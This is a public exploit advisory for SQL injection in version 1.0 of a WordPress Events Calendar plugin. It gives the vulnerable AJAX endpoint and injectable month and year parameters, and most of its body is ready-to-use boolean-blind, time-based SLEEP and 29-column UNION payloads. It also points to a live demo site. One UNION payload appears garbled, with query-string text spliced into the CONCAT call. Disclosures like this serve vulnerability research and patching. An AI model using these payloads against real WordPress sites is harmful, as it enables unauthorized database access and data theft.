Wordpress Plugin Events Calendar SQL Injection

2018.05.30
Credit: AkkuS
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Exploit Title: Wordpress Plugin Events Calendar - SQL Injection # Dork: N/A # Date: 2018-05-27 # Exploit Author: Özkan Mustafa Akkuş (AkkuS) # Vendor: Wachipi # Vendor Homepage: https://codecanyon.net/item/wp-events-calendar-plugin/5025660 # Version: 1.0 # Category: Webapps # Tested on: Kali linux # Description : An attacker can perform attacks via calendar ajax queries. # However, this plugin is fully PHP-enabled. You can run SQL query with # "month" and "year" parameters. # These parameters are also suitable for XSS attacks. # All PHP queries for which these parameters work have the same vulnerable. # "getBookingForm.php, getMonthCalendar.php, getEventsList.php" # Demo : http://www.checkingarea.com/EVENTS_WP/ # PoC : SQLi : # GET /EVENTS_WP/wp-content/plugins/wp-events-calendar/public/ajax/getEventsList.php?year=2018&month=5&day=1&calendar_id=1&pag=1 # Parameter: month (GET) # Type: boolean-based blind # Title: AND boolean-based blind - WHERE or HAVING clause # Payload: year=2018&month=5' AND 7958=7958 AND 'FXnO'='FXnO&day=1&calendar_id=1&pag=1 # Type: AND/OR time-based blind # Title: MySQL >= 5.0.12 AND time-based blind # Payload: year=2018&month=5' AND SLEEP(5) AND 'MmZz'='MmZz&day=1&calendar_id=1&pag=1 # Type: UNION query # Title: MySQL UNION query (NULL) - 29 columns # Payload: year=2018&month=5' UNION ALL SELECT NULL,NULL,CONCAT&day=1&calendar_id=1&pag=1(0x71786a7171,0x424e507748695862436e774c4a4d664a7751424c537678554656465a464b7074685051527676756e,0x7178707071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&calendar_id=1 # Parameter: year (GET) # Type: boolean-based blind # Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) # Payload: year=-8454' OR 7997=7997#&month=5&day=1&calendar_id=1&pag=1 # Type: AND/OR time-based blind # Title: MySQL >= 5.0.12 AND time-based blind # Payload: year=2018' AND SLEEP(5)-- uTJs&month=5&day=1&calendar_id=1&pag=1 # Type: UNION query # Title: MySQL UNION query (NULL) - 29 columns # Payload: year=2018' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71786a7171,0x7766694a50504a425a6e635a564b5172674c745770414e4f46494977475a44626b416a6c797a674b,0x7178707071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&month=5&day=1&calendar_id=1&pag=1


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top